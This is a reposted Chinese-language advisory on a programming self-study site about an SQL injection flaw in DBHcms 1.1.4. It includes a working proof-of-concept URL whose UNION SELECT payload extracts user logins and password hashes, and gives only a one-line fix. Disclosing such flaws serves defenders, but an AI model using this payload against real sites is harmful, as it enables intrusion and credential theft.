好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

DBHcms 1.1.4 SQL注入漏洞及修复 - 网站安全 - 自学

漏洞 描述:DBHcms是一个面向个人和小型商业网站的开源内容管理 系统 ,同时开发多种语言版本很好的支持搜索引擎优化。程序存在漏洞主要原因是未对提交参数进行严格过滤,导致SQL注入攻击漏洞产生。

 SQL注入测试代码: http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users --

修复方案:

过滤提交参数

查看更多关于DBHcms 1.1.4 SQL注入漏洞及修复 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11141
  阅读:51次

上一篇: 谨防3种通过SEO方式攻击网站的方法 - 网站安全

下一篇:面对跨站脚本攻击XSS的安全防御的有价值的建议